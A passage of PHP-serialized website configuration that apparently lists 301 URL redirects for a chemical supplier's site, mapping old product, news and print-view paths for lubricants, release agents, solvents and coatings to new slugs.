rchive=y";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:290;a:4:{s:6:"origin";s:40:"md__m_west_trade_show/?Archive=y&print=y";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:291;a:4:{s:6:"origin";s:30:"md__m_west_trade_show/?print=y";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:292;a:4:{s:6:"origin";s:18:"media-head-cleaner";s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:293;a:4:{s:6:"origin";s:27:"media_head_cleaner/?print=y";s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:294;a:4:{s:6:"origin";s:28:"military-specs--nsn/?print=y";s:3:"url";s:21:"mil-prf-27617-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:295;a:4:{s:6:"origin";s:8:"ms-122xd";s:3:"url";s:16:"product/ms-122xd";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:296;a:4:{s:6:"origin";s:17:"ms-143ax/?print=y";s:3:"url";s:36:"product/universal-ptfe-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:297;a:4:{s:6:"origin";s:7:"ms-143e";s:3:"url";s:32:"product/ptfe-mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:298;a:4:{s:6:"origin";s:16:"ms-143e/?print=y";s:3:"url";s:32:"product/ptfe-mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:299;a:4:{s:6:"origin";s:7:"ms-143h";s:3:"url";s:32:"product/ptfe-mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:300;a:4:{s:6:"origin";s:16:"ms-143h/?print=y";s:3:"url";s:32:"product/ptfe-mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:301;a:4:{s:6:"origin";s:17:"ms-470c___ms-472c";s:3:"url";s:55:"chemicals/conformal-coatings/urethane-conformal-coating";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:302;a:4:{s:6:"origin";s:48:"n-PB_replacements_for_oxygen_cleaning/?Archive=y";s:3:"url";s:14:"vertrel-fluids";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:303;a:4:{s:6:"origin";s:56:"n-PB_replacements_for_oxygen_cleaning/?Archive=y&print=y";s:3:"url";s:14:"vertrel-fluids";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:304;a:4:{s:6:"origin";s:35:"news/default.aspx?Archive=y&F_All=y";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:305;a:4:{s:6:"origin";s:32:"news/default.aspx?Archive=y&pg=2";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:306;a:4:{s:6:"origin";s:32:"news/default.aspx?Archive=y&pg=3";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:307;a:4:{s:6:"origin";s:40:"news/default.aspx?Archive=y&print=y&pg=3";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:308;a:4:{s:6:"origin";s:35:"news/default.aspx?F_All=y&Archive=y";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:309;a:4:{s:6:"origin";s:30:"news/default.aspx?pg=2&print=y";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:310;a:4:{s:6:"origin";s:22:"news/default.aspx?pg=3";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:311;a:4:{s:6:"origin";s:25:"news/default.aspx?print=y";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:312;a:4:{s:6:"origin";s:35:"news/default.aspx?print=y&Archive=y";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:313;a:4:{s:6:"origin";s:33:"news/default.aspx?print=y&F_All=y";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:314;a:4:{s:6:"origin";s:30:"news/default.aspx?print=y&pg=1";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:315;a:4:{s:6:"origin";s:30:"news/default.aspx?print=y&pg=3";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:316;a:4:{s:6:"origin";s:32:"non-ptfe-release-agents/?print=y";s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:317;a:4:{s:6:"origin";s:25:"npb_and_hcfc_225/?print=y";s:3:"url";s:14:"vertrel-fluids";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:318;a:4:{s:6:"origin";s:16:"other-lubricants";s:3:"url";s:20:"chemicals/lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:319;a:4:{s:6:"origin";s:15:"penetrating_oil";s:3:"url";s:23:"product/penetrating-oil";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:320;a:4:{s:6:"origin";s:12:"pfpe_cleaner";s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:321;a:4:{s:6:"origin";s:21:"pfpe_cleaner/?print=y";s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:322;a:4:{s:6:"origin";s:11:"pfpecleaner";s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:323;a:4:{s:6:"origin";s:20:"pfpecleaner/?print=y";s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:324;a:4:{s:6:"origin";s:26:"precision_cleaning_solvent";s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:325;a:4:{s:6:"origin";s:31:"precision_cleaning_solvent_lgw1";s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:326;a:4:{s:6:"origin";s:40:"precision_cleaning_solvent_lgw1/?print=y";s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:327;a:4:{s:6:"origin";s:19:"privacy_policy.aspx";s:3:"url";s:1:"/";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:328;a:4:{s:6:"origin";s:27:"privacy_policy.aspx?print=y";s:3:"url";s:1:"/";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:329;a:4:{s:6:"origin";s:36:"products/default.aspx?DepartmentId=1";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:330;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=10";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:331;a:4:{s:6:"origin";s:38:"products/default.aspx?DepartmentId=105";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:332;a:4:{s:6:"origin";s:38:"products/default.aspx?DepartmentId=108";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:333;a:4:{s:6:"origin";s:38:"products/default.aspx?DepartmentId=109";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:334;a:4:{s:6:"origin";s:38:"products/default.aspx?DepartmentId=110";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:335;a:4:{s:6:"origin";s:38:"products/default.aspx?DepartmentId=117";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:336;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=27";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:337;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=29";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:338;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=30";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:339;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=36";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:340;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=38";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:341;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=40";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:342;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=44";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:343;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=46";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:344;a:4:{s:6:"origin";s:36:"products/default.aspx?DepartmentId=5";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:345;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=51";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:346;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=53";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:347;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=55";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:348;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=57";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:349;a:4:{s:6:"origin";s:36:"products/default.aspx?DepartmentId=6";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:350;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=66";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:351;a:4:{s:6:"origin";s:36:"products/default.aspx?DepartmentId=7";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:352;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=75";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:353;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=77";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:354;a:4:{s:6:"origin";s:37:"products/default.aspx?DepartmentId=79";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:355;a:4:{s:6:"origin";s:36:"products/default.aspx?DepartmentId=9";s:3:"url";s:17:"chemical-products";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:356;a:4:{s:6:"origin";s:18:"protective-varnish";s:3:"url";s:47:"chemicals/conformal-coatings/protective-varnish";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:357;a:4:{s:6:"origin";s:26:"protective_varnish_ms-452n";s:3:"url";s:15:"product/ms-252n";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:358;a:4:{s:6:"origin";s:35:"protective_varnish_ms-452n/?print=y";s:3:"url";s:15:"product/ms-252n";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:359;a:4:{s:6:"origin";s:37:"protectiveconformal-coatings/?print=y";s:3:"url";s:28:"chemicals/conformal-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:360;a:4:{s:6:"origin";s:42:"ptfe-release-agent--dry-lubricant/?print=y";s:3:"url";s:44:"chemicals/release-agents/ptfe-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:361;a:4:{s:6:"origin";s:11:"quik-freeze";s:3:"url";s:27:"product/quik-freeze-ms-242n";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:362;a:4:{s:6:"origin";s:17:"quik-freeze%C2%AE";s:3:"url";s:27:"product/quik-freeze-ms-242n";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:363;a:4:{s:6:"origin";s:26:"quik-freeze%C2%AE/?print=y";s:3:"url";s:27:"product/quik-freeze-ms-242n";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:364;a:4:{s:6:"origin";s:31:"quik-freeze-antistatic/?print=y";s:3:"url";s:30:"product/quik-freeze-antistatic";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:365;a:4:{s:6:"origin";s:11:"release.htm";s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:366;a:4:{s:6:"origin";s:15:"release_001.htm";s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:367;a:4:{s:6:"origin";s:15:"release_002.htm";s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:368;a:4:{s:6:"origin";s:15:"release_003.htm";s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:369;a:4:{s:6:"origin";s:15:"release_004.htm";s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:370;a:4:{s:6:"origin";s:12:"rtv-sealants";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:371;a:4:{s:6:"origin";s:21:"rtv-sealants/?print=y";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:372;a:4:{s:6:"origin";s:41:"safezone_cleaner_for_plastic_glass__metal";s:3:"url";s:35:"product/plastic-glass-metal-cleaner";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:373;a:4:{s:6:"origin";s:16:"sampe_trade_show";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:374;a:4:{s:6:"origin";s:35:"sampe_trade_show/?Archive=y&print=y";s:3:"url";s:4:"news";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:375;a:4:{s:6:"origin";s:16:"solvent-cleaners";s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:376;a:4:{s:6:"origin";s:20:"solvent_cleaners.htm";s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:377;a:4:{s:6:"origin";s:24:"solvent_cleaners_002.htm";s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:378;a:4:{s:6:"origin";s:24:"solvent_cleaners_003.htm";s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:379;a:4:{s:6:"origin";s:24:"solvent_cleaners_005.htm";s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:380;a:4:{s:6:"origin";s:24:"solvent_cleaners_006.htm";s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:381;a:4:{s:6:"origin";s:9:"specs.htm";s:3:"url";s:8:"articles";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:382;a:4:{s:6:"origin";s:13:"specs_003.htm";s:3:"url";s:8:"articles";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:383;a:4:{s:6:"origin";s:15:"surface-cleaner";s:3:"url";s:43:"chemicals/solvents/solvsys/contact-cleaners";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:384;a:4:{s:6:"origin";s:24:"surface_cleaner/?print=y";s:3:"url";s:43:"chemicals/solvents/solvsys/contact-cleaners";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:385;a:4:{s:6:"origin";s:33:"ultra_low_global_warming_products";s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:386;a:4:{s:6:"origin";s:42:"ultra_low_global_warming_products/?print=y";s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:387;a:4:{s:6:"origin";s:7:"vertrel";s:3:"url";s:26:"chemicals/solvents/vertrel";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:388;a:4:{s:6:"origin";s:35:"vertrel%C2%AE_xsi_silicone_solvent_";s:3:"url";s:20:"product/vertrel-x-si";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:389;a:4:{s:6:"origin";s:44:"vertrel%C2%AE_xsi_silicone_solvent_/?print=y";s:3:"url";s:20:"product/vertrel-x-si";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:390;a:4:{s:6:"origin";s:27:"vertrel_mca_cleaning_agent_";s:3:"url";s:19:"product/vertrel-mca";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:391;a:4:{s:6:"origin";s:36:"vertrel_mca_cleaning_agent_/?print=y";s:3:"url";s:19:"product/vertrel-mca";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:392;a:4:{s:6:"origin";s:45:"vertrel_smt_heavy_duty_solvent__flux_remover_";s:3:"url";s:19:"product/vertrel-smt";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:393;a:4:{s:6:"origin";s:54:"vertrel_smt_heavy_duty_solvent__flux_remover_/?print=y";s:3:"url";s:19:"product/vertrel-smt";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:394;a:4:{s:6:"origin";s:25:"vertrel_xf_cleaning_agent";s:3:"url";s:18:"product/vertrel-xf";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:395;a:4:{s:6:"origin";s:25:"water-base-release-agents";s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:396;a:4:{s:6:"origin";s:39:"water_based_release_agent_for_hot_molds";s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:397;a:4:{s:6:"origin";s:28:"you_are_invited.aspx?print=y";s:3:"url";s:5:"about";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:399;a:4:{s:6:"origin";s:33:"chemicals/epoxy-resins/epon-epoxy";s:3:"url";s:39:"chemicals/epoxy-resins/epon-epoxy-resin";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:400;a:4:{s:6:"origin";s:16:"product/ms-153bn";s:3:"url";s:38:"product/high-temperature-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:401;a:4:{s:6:"origin";s:41:"chemicals/release-agents/high-temperature";s:3:"url";s:49:"chemicals/release-agents/high-temp-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:402;a:4:{s:6:"origin";s:5:"about";s:3:"url";s:17:"miller-stephenson";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:403;a:4:{s:6:"origin";s:17:"miller-stephenson";s:3:"url";s:23:"about-miller-stephenson";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:404;a:4:{s:6:"origin";s:54:"chemicals/epoxy-resins/epirez-waterborne-resin-epi-rez";s:3:"url";s:43:"chemicals/epoxy-resins/epi-rez-epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:405;a:4:{s:6:"origin";s:27:"product/quik-freeze-ms-242n";s:3:"url";s:19:"product/quik-freeze";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:406;a:4:{s:6:"origin";s:12:"product/sion";s:3:"url";s:19:"product/opteon-sion";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:407;a:4:{s:6:"origin";s:29:"product/ms-470s-12-oz-aerosol";s:3:"url";s:43:"product/mil-spec-urethane-conformal-coating";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:409;a:4:{s:6:"origin";s:15:"product/ms-252n";s:3:"url";s:33:"product/varnish-conformal-coating";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:410;a:4:{s:6:"origin";s:49:"chemicals/lubricants/krytox-lubricants/vpf-krytox";s:3:"url";s:51:"chemicals/lubricants/krytox-lubricants/other-krytox";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:411;a:4:{s:6:"origin";s:13:"product/143az";s:3:"url";s:20:"product/krytox-143az";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:412;a:4:{s:6:"origin";s:24:"chemicals/release-agents";s:3:"url";s:29:"chemicals/mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:413;a:4:{s:6:"origin";s:17:"product/ms-122sel";s:3:"url";s:45:"product/low-global-warming-ptfe-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:415;a:4:{s:6:"origin";s:15:"product/ms-755l";s:3:"url";s:28:"product/ms-755l-flux-remover";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:416;a:4:{s:6:"origin";s:24:"product/dental-lubricant";s:3:"url";s:35:"product/dental-handpiece-lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:417;a:4:{s:6:"origin";s:47:"composite-mold-release-agents-miller-stephenson";s:3:"url";s:29:"composite-mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:418;a:4:{s:6:"origin";s:64:"chemicals/lubricants/tribosys-lubricants/ptfe-dryfilm-lubricants";s:3:"url";s:44:"chemicals/lubricants/ptfe-dryfilm-lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:419;a:4:{s:6:"origin";s:44:"chemicals/lubricants/ptfe-dryfilm-lubricants";s:3:"url";s:45:"chemicals/lubricants/ptfe-dry-film-lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:420;a:4:{s:6:"origin";s:26:"product/aeroduster-ms-222n";s:3:"url";s:27:"product/aero-duster-ms-222n";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:421;a:4:{s:6:"origin";s:44:"product/semi-permanent-mold-release-agents-2";s:3:"url";s:22:"product/release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:422;a:4:{s:6:"origin";s:37:"product/rubber-molding-release-agents";s:3:"url";s:34:"product/rubber-mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:423;a:4:{s:6:"origin";s:17:"conformal-coating";s:3:"url";s:18:"conformal-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:424;a:4:{s:6:"origin";s:30:"product/dry-film-release-agent";s:3:"url";s:38:"product/water-based-ptfe-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:425;a:4:{s:6:"origin";s:42:"product/semi-permanent-mold-release-agents";s:3:"url";s:35:"product/urethane-mold-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:426;a:4:{s:6:"origin";s:31:"product/dry-film-release-agents";s:3:"url";s:34:"product/water-based-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:427;a:4:{s:6:"origin";s:34:"product/water-based-release-agents";s:3:"url";s:39:"product/ptfe-water-based-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:428;a:4:{s:6:"origin";s:26:"product/mold-release-agent";s:3:"url";s:38:"product/water-based-mold-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:429;a:4:{s:6:"origin";s:19:"mold-release-agents";s:3:"url";s:18:"mold-release-agent";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:430;a:4:{s:6:"origin";s:27:"product/ptfe-release-agents";s:3:"url";s:40:"product/water-based-mold-release-agent-2";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:431;a:4:{s:6:"origin";s:40:"product/water-based-mold-release-agent-2";s:3:"url";s:39:"product/water-based-mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:432;a:4:{s:6:"origin";s:28:"chemicals/conformal-coatings";s:3:"url";s:27:"chemicals/conformal-coating";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:433;a:4:{s:6:"origin";s:15:"product/ms-472s";s:3:"url";s:39:"product/polyurethane-conformal-coatings";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:435;a:4:{s:6:"origin";s:35:"product/plastic-glass-metal-cleaner";s:3:"url";s:14:"product/ms-260";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:436;a:4:{s:6:"origin";s:21:"product/contact-re-nu";s:3:"url";s:29:"product/ms-532n-contact-re-nu";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:437;a:4:{s:6:"origin";s:29:"product/ms-532n-contact-re-nu";s:3:"url";s:29:"product/ms-530n-contact-re-nu";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:438;a:4:{s:6:"origin";s:15:"product/ms-124h";s:3:"url";s:35:"product/ms-124h-connector-lubricant";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:439;a:4:{s:6:"origin";s:11:"product/the";s:3:"url";s:37:"product/teflon-heavy-equipment-grease";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:440;a:4:{s:6:"origin";s:12:"product/1102";s:3:"url";s:31:"product/teflon-high-temp-grease";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:441;a:4:{s:6:"origin";s:21:"product/tribosys-214x";s:3:"url";s:41:"product/tribosys-214x-gear-box-lubricants";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:442;a:4:{s:6:"origin";s:21:"product/tribosys-216x";s:3:"url";s:42:"product/tribosys-216x-compressor-lubricant";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:443;a:4:{s:6:"origin";s:21:"product/tribosys-217x";s:3:"url";s:36:"product/tribosys-217x-hydraulic-oils";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:444;a:4:{s:6:"origin";s:21:"product/tribosys-212x";s:3:"url";s:32:"product/tribosys-212x-chain-oils";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:445;a:4:{s:6:"origin";s:21:"product/tribosys-218x";s:3:"url";s:39:"product/tribosys-218x-roller-chain-oils";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:446;a:4:{s:6:"origin";s:22:"product/triobosys-2200";s:3:"url";s:49:"product/tribosys-2200-food-grade-silicone-aerosol";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:447;a:4:{s:6:"origin";s:21:"product/tribosys-222x";s:3:"url";s:46:"product/tribosys-222x-high-temperature-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:448;a:4:{s:6:"origin";s:21:"product/tribosys-221x";s:3:"url";s:45:"product/tribosys-221x-general-purpose-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:449;a:4:{s:6:"origin";s:22:"category/uncategorized";s:3:"url";s:22:"category/press-release";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:450;a:4:{s:6:"origin";s:21:"product/tribosys-223x";s:3:"url";s:40:"product/tribosys-223x-food-grade-greases";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:451;a:4:{s:6:"origin";s:21:"product/tribosys-211x";s:3:"url";s:42:"product/tribosys-211x-general-purpose-oils";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:452;a:4:{s:6:"origin";s:37:"product/cleaning-solvent-flux-remover";s:3:"url";s:41:"product/cleaning-solvent-and-flux-remover";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:453;a:4:{s:6:"origin";s:43:"http://miller-stephenson.com/release-agents";s:3:"url";s:29:"chemicals/mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:454;a:4:{s:6:"origin";s:29:"http://miller-stephenson.com/";s:3:"url";s:1:"/";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:455;a:4:{s:6:"origin";s:18:"ptfe-release-agent";s:3:"url";s:29:"chemicals/mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:456;a:4:{s:6:"origin";s:33:"ptfe-release-agent--dry-lubricant";s:3:"url";s:29:"chemicals/mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:457;a:4:{s:6:"origin";s:5:"epoxy";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:458;a:4:{s:6:"origin";s:17:"epon-epoxy-resins";s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:459;a:4:{s:6:"origin";s:15:"contact_us.aspx";s:3:"url";s:7:"contact";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:460;a:4:{s:6:"origin";s:11:"techsup.htm";s:3:"url";s:12:"tech-support";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:461;a:4:{s:6:"origin";s:35:"http://miller-stephenson.com/krytox";s:3:"url";s:6:"krytox";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:462;a:4:{s:6:"origin";s:28:"miller-stephenson.com/krytox";s:3:"url";s:6:"krytox";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:463;a:4:{s:6:"origin";s:10:"lubricants";s:3:"url";s:6:"krytox";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:464;a:4:{s:6:"origin";s:36:"miller-stephenson.com/release-agents";s:3:"url";s:29:"chemicals/mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:465;a:4:{s:6:"origin";s:14:"release-agents";s:3:"url";s:29:"chemicals/mold-release-agents";s:4:"type";i:301;s:6:"format";s:5:"plain";}i:466;a:4:{s:6:"origin";s:51:"product/millube-perfluorinated-synthetic-lubricants";s:3:"url";s:43:"product/biocompatible-lubricants-grease-oil";s:4:"typ